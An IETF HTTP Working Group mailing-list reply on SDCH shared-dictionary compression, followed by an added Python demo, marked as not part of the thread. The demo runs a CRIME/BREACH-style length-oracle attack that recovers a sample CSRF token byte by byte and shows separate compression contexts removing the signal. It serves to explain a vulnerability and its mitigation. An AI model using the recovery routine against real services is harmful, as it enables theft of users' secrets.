
Re: Shared Dictionaries (SDCH and friends)

From: Martin Thomson <martin.thomson@gmail.com>
Date: Fri, 20 Jan 2017 17:08:49 +1300
Message-ID: <CABkgnnVYWJ9OhmROnd2NCX=A8_tHyQge0kUp4bTBj5eiRy8sCA@mail.gmail.com>
To: chaals@yandex-team.ru
Cc: HTTP Working Group <ietf-http-wg@w3.org>

Hey Chaals,

In case you missed the suggestion at the last meeting from Vlad, he
suggested that this only be offered for use with fetches with a
credentials-mode (See
https://fetch.spec.whatwg.org/#concept-request-credentials-mode) of
"omit".  That is, don't make it possible for the server to use ambient
authority (including cookies) to customize the request.  I don't think
that completely removes the concern, but it helps.

I don't think that having tools for separating "possibly under
attacker influence" and "secret" is going to solve the issue.  That's
already possible with existing compression techniques; the concern is
over the usability of those tools and the ability to correctly
identify data as belonging to each category.

On 20 January 2017 at 16:48,  <chaals@yandex-team.ru> wrote:
> Additionally, since this is a new powerful feature, there is no reason not to restrict it to secure connections.

FWIW, the security concerns ONLY apply to secure connections, so you
needn't worry about this bit.  If you are going to spray your secrets
all over the internet, traffic analysis isn't really your most
pressing concern.

Received on Friday, 20 January 2017 04:09:22 UTC
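The length-oracle concern behind this exchange, as an added Python example that is not part of the thread and not SDCH or Chromium code: attacker-influenced text and a secret compressed in one DEFLATE context (the CRIME/BREACH pattern), so the response size reveals whether a reflected guess matches the next byte of the secret. The page layout, the 16-hex-character CSRF token and the "value='" template text the attacker is assumed to know are all constructed for the example, and zlib is pinned to fixed Huffman coding so the size signal is exactly one byte. The same code shows the separation Martin refers to, compressing the "possibly under attacker influence" and "secret" parts in different contexts, which removes the signal.

```python
import zlib

# Constructed sample page (not from the thread). Assumptions: the response
# reflects an attacker-controlled query parameter, carries a per-session
# 16-hex-character CSRF token, and the attacker knows the template text
# ("value='") that precedes the token but not the token itself.
SECRET_TOKEN = "9f3a7c2e1b4d8e6f"
TOKEN_CONTEXT = "value='"
HEX = "0123456789abcdef"
WINDOW = 6   # known bytes re-sent with each guess (see recover_token)


def deflate_size(data: bytes) -> int:
    """Bytes on the wire for one DEFLATE context.

    Z_FIXED pins DEFLATE to its fixed Huffman table, so one saved literal is
    exactly one byte and the demo is deterministic. Against dynamic Huffman
    coding an attacker needs padding/alignment tricks to get the same signal.
    """
    strategy = getattr(zlib, "Z_FIXED", 4)   # 4 is Z_FIXED in zlib.h
    c = zlib.compressobj(level=9, strategy=strategy)
    return len(c.compress(data) + c.flush())


def page_parts(reflected: str):
    """The page, split into the attacker-influenced part and the secret-bearing part."""
    untrusted = f"<html><body><p>Search results for: {reflected}</p>".encode()
    secret = (
        "<form>"
        f"<input type=hidden name=csrf {TOKEN_CONTEXT}{SECRET_TOKEN}'>"
        "<input type=hidden name=next value='/home'>"
        "</form></body></html>"
    ).encode()
    return untrusted, secret


def size_shared_context(reflected: str) -> int:
    """Vulnerable shape: one compression context covers both parts, so a
    guess in the reflected text can become a back-reference for the secret."""
    untrusted, secret = page_parts(reflected)
    return deflate_size(untrusted + secret)


def size_separate_contexts(reflected: str) -> int:
    """Mitigated shape: attacker-influenced and secret data never share a
    context, so the guess cannot change how the secret compresses."""
    untrusted, secret = page_parts(reflected)
    return deflate_size(untrusted) + deflate_size(secret)


def recover_token(size_fn, length: int = len(SECRET_TOKEN)) -> str:
    """Byte-at-a-time recovery through the length oracle size_fn.

    Each guess re-sends the last WINDOW known bytes plus one candidate; the
    candidate that continues the real token lengthens the back-reference by
    one byte and so yields the smallest response. The window is kept short so
    both match lengths fall under DEFLATE length codes without extra bits,
    which keeps the size difference at exactly one byte. Stops when the oracle
    gives no unique winner.
    """
    known = ""
    for _ in range(length):
        window = (TOKEN_CONTEXT + known)[-WINDOW:]
        sizes = {c: size_fn(window + c) for c in HEX}
        smallest = min(sizes.values())
        winners = [c for c, s in sizes.items() if s == smallest]
        if len(winners) != 1:
            break
        known += winners[0]
    return known


if __name__ == "__main__":
    print("shared context   :", recover_token(size_shared_context) or "(no signal)")
    print("separate contexts:", recover_token(size_separate_contexts) or "(no signal)")
```

Run as a script, the shared-context oracle recovers the whole token one hex digit at a time, while the separated version produces sixteen equal sizes at the first digit and stops. Note that the separation only helps when every secret has actually been placed on the right side of the split; the example gets that right by construction, which is exactly the classification problem Martin says the tooling does not solve.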
